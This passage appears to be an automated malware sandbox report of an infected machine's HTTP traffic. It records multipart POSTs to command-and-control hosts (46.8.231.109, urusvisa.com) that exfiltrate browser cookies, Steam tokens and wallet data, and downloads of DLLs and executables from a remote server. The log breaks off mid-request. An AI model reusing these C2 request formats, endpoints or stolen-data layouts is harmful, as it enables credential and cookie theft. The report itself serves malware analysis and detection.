0a 0d 0a 2d 2d 2d 2d 2d 2d 41 46 49 44 47 44 42 47 43 41 41 46 49 44 48 49 4a 4b 45 48 2d 2d 0d 0a Data Ascii: ------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AFIDGDBGCAAFIDHIJKEHContent-Disposition: form-data; name="file"------AFIDGDBGCAAFIDHIJKEH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKFCGHIDHCBGDHJKEBHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 4b 46 43 47 48 49 44 48 43 42 47 44 48 4a 4b 45 42 2d 2d 0d 0a Data Ascii: ------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHJKFCGHIDHCBGDHJKEBContent-Disposition: form-data; name="file"------EHJKFCGHIDHCBGDHJKEB--
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/freebl3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/mozglue.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/msvcp140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/nss3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/softokn3.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /1309cdeb8f4c8736/vcruntime140.dll HTTP/1.1Host: 46.8.231.109Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEGHJEGHJKFIEBFHJKKHost: 46.8.231.109Content-Length: 947Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKFBAFIDAEBFHJKJEBFHost: 46.8.231.109Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 46 42 41 46 49 44 41 45 42 46 48 4a 4b 4a 45 42 46 2d 2d 0d 0a Data Ascii: ------KJKFBAFIDAEBFHJKJEBFContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------KJKFBAFIDAEBFHJKJEBFContent-Disposition: form-data; name="message"wallets------KJKFBAFIDAEBFHJKJEBF--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDAFIEBFCBKFHIDHIJEHost: 46.8.231.109Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 44 41 46 49 45 42 46 43 42 4b 46 48 49 44 48 49 4a 45 2d 2d 0d 0a Data Ascii: ------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------FIDAFIEBFCBKFHIDHIJEContent-Disposition: form-data; name="message"files------FIDAFIEBFCBKFHIDHIJE--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFHHost: 46.8.231.109Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="file"------CAFIEBKKJJDAKFHIDBFH--
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 45 48 49 4a 45 42 4b 45 42 46 42 46 48 49 49 44 48 49 2d 2d 0d 0a Data Ascii: ------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------HJEHIJEBKEBFBFHIIDHIContent-Disposition: form-data; name="message"ybncbhylepme------HJEHIJEBKEBFBFHIIDHI--
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1Host: files.veritas.org.ngCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4754d4f680ead72.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKKEHJDHJKFIECAAKFIJHost: 46.8.231.109Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 32 31 64 30 30 64 65 38 35 35 30 65 39 38 65 33 63 38 34 64 62 38 37 66 65 36 35 65 66 61 36 36 39 38 62 36 65 63 38 62 39 31 35 64 64 39 32 65 63 61 30 34 34 38 34 64 63 38 35 66 61 34 35 35 63 34 35 61 30 65 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 4b 46 49 4a 2d 2d 0d 0a Data Ascii: ------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="token"821d00de8550e98e3c84db87fe65efa6698b6ec8b915dd92eca04484dc85fa455c45a0eb------JKKEHJDHJKFIECAAKFIJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------JKKEHJDHJKFIECAAKFIJ--
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCGIIEHIEGDGDGCAEBGHost: urusvisa.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 47 49 49 45 48 49 45 47 44 47 44 47 43 41 45 42 47 2d 2d 0d 0a Data Ascii: ------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="hwid"54A50671C48A3788952882-a33c7340-61ca------CFCGIIEHIEGDGDGCAEBGContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------CFCGIIEHIEGDGDGCAEBG--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEHDHIEGIIIDHIDHDHJHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 48 44 48 49 45 47 49 49 49 44 48 49 44 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------KJEHDHIEGIIIDHIDHDHJContent-Disposition: form-data; name="mode"1------KJEHDHIEGIIIDHIDHDHJ--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCFHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 47 43 42 46 43 42 46 42 4b 46 48 49 45 43 41 46 43 46 2d 2d 0d 0a Data Ascii: ------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------KEGCBFCBFBKFHIECAFCFContent-Disposition: form-data; name="mode"2------KEGCBFCBFBKFHIECAFCF--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBAHost: urusvisa.comContent-Length: 332Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 6f 64 65 22 0d 0a 0d 0a 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 2d 2d 0d 0a Data Ascii: ------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="mode"21------EBAKEBAECGCBAAAAAEBA--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKFHost: urusvisa.comContent-Length: 7629Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGCHost: urusvisa.comContent-Length: 829Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 62 66 33 33 35 31 39 34 39 66 61 38 35 66 62 61 65 33 61 32 36 65 63 65 35 35 66 35 33 63 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 51 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 64 61 74 61 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 4b 4a 4b 4a 45 42 47 48 4a 4b 46 48 49 44 47 43 2d 2d 0d 0a Data Ascii: ------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="token"ebf3351949fa85fbae3a26ece55f53cb------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------AAAAKJKJEBGHJKFHIDGCContent-Disposition: form-data; name="file_name"Q29va2llc
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: urusvisa.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAECHost: urusvisa.comContent-Length: 256Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 41 35 30 36 37 31 43 34 38 41 33 37 38 38 39 35 32 38 38 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 37 37 32 63 39 37 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 2d 2d 0d 0a Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="hwid"54A50671C48A3788952882-a33c7340-61ca------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="build_id"a669a86f8433a1e88901711c0f772c97------HJJKFBGCFHCGDHIDAAEC--
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHCBAAAFHJDHJJKEBGHIHost: urusvisa.comContent-Length: 331Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 65 63 35 37 30 36 63 33 37 62 30 66 35 66 30 30 34 31 36 63 30 39 34 33 36 64 35 34 36 63 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 42 41 41 41 46 48 4a 44 48 4a 4a 4b 45 42 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 36 36 39 61 38 36 66 38 34 33 33 61 31 65 38 38 39 30 31 37 31 31 63 30 66 